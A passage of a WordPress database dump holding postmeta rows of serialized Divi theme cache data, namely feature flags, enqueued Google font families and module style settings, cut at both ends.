:19:\"all_canvas_metadata\";a:0:{}}'),(32065,48,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:20:\"block_layout_enabled\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:25:\"media_embedded_in_content\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:6:{i:0;s:41:\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\";i:1;s:18:\"gcid-primary-color\";i:2;s:20:\"gcid-secondary-color\";i:3;s:18:\"gcid-heading-color\";i:4;s:15:\"gcid-body-color\";i:5;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32066,48,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:4:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";i:2;s:21:\"ZCOOL+XiaoWei:regular\";i:3;s:111:\"Josefin+Sans:100,200,300,regular,500,600,700,100italic,200italic,300italic,italic,500italic,600italic,700italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32067,48,'_et_builder_module_features_cache','a:2:{i:0;s:52:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"tb\":[],\"wpe\":[]}\";i:1;a:18:{i:0;a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_458440056d8d0e1cdf00dc66759f8c8f\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_c704c0b72a43bb19e67bfdddeb4d7453\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_fc0fb71ee8c9bd01d65de6ff06d3602c\";a:7:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_92a5d30e7f6646381a575f96494c646e\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_ca7e71738797f6c325800d0267a6549d\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_1561a41cf9aee27606f7e135d874132f\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_code_8bb4f36ea9c697fe13386135306d80b6\";a:4:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_22102e7e1948cc936910e4a8324ff56d\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_cb63b36bce768deae430c0a449251404\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_683012fd291d68aa37bc5c81f9eae7dc\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_8b39a575ee6e716aa17a4b38776a18f2\";a:10:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:3:\"bor\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_b65aae719f7164d2152a4d37d29ebf95\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_661390ed760e7d65552d7fad2c61901b\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_de25f7f13df2da36f0237af20ddd13b3\";a:7:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_4494fef151854cb6f58571c3c543e9d2\";a:7:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_button_520491e5bb80528d48617feaa9b601fb\";a:7:{s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:3:\"but\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_71e0d05c627633744978c7e45672ac0d\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}}}'),(32068,1161,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32069,1161,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32070,1161,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32071,1161,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32072,694,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32073,694,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32074,694,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32058,1625,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32059,1121,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32060,1121,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32054,1368,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32055,1625,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32056,1625,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32057,1625,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32050,1403,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32051,1368,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32052,1368,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32053,1368,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32047,1403,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32048,1403,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32049,1403,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32026,823,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32027,1554,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32028,1554,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32029,1554,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32030,1554,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32031,1297,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32032,1297,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32033,1297,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32034,1297,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32035,1523,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32036,1523,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32037,1523,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32038,1523,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32039,1618,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32040,1618,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32041,1618,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32042,1618,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32043,1034,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32044,1034,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32045,1034,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\